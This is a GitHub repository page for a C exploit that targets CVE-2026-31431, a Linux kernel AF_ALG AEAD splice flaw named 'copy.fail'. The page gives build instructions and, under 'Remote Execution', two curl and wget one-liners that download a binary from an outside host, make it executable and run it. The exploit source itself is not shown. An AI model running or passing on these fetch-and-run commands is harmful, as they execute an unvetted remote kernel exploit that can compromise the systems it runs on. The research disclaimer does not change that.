Skip to content

offsecguy/CVE-2026-31431

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
README.md
README.md
 
 
exp
exp
 
 
exp.c
exp.c
 
 

Repository files navigation

copy.fail — AF_ALG AEAD splice primitive (CVE-2026-31431)

Overview

This project is a C port of the original Python prototype, by offsecguy.
It leverages the Linux kernel crypto API (AF_ALG) using:

  • authencesn(hmac(sha256),cbc(aes)) AEAD mode
  • MSG_MORE flag
  • splice() system call

The technique feeds data from a read-only file descriptor through a crypto socket, processing it chunk-by-chunk.

⚙️ Compilation

Option 1 — musl (Static Build)

musl-gcc -static -Os -s -o exp exp.c -I./zlib-1.3.2 -L./zlib-1.3.2 -lz

Option 2 — GCC Static

gcc exp.c -o exp -lz -s -static

Option 3 — GCC Dynamic

gcc exp.c -o exp -lz -s

🚀 Remote Execution

curl -sLo exp chosen.to/copyfail && chmod +x exp ; ./exp
wget chosen.to/copyfail -qO exp && chmod +x exp ; ./exp

⚠️ Notes

  • Requires Linux kernel support for AF_ALG
  • Uses zlib for decompression
  • Designed for low-level kernel crypto interaction and experimentation

Disclaimer

This code is provided for educational and research purposes only.
Use responsibly and only on systems you are authorized to test.

About

Copy Fail is a straight-line logic flaw | C port | CVE-2026-31431

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages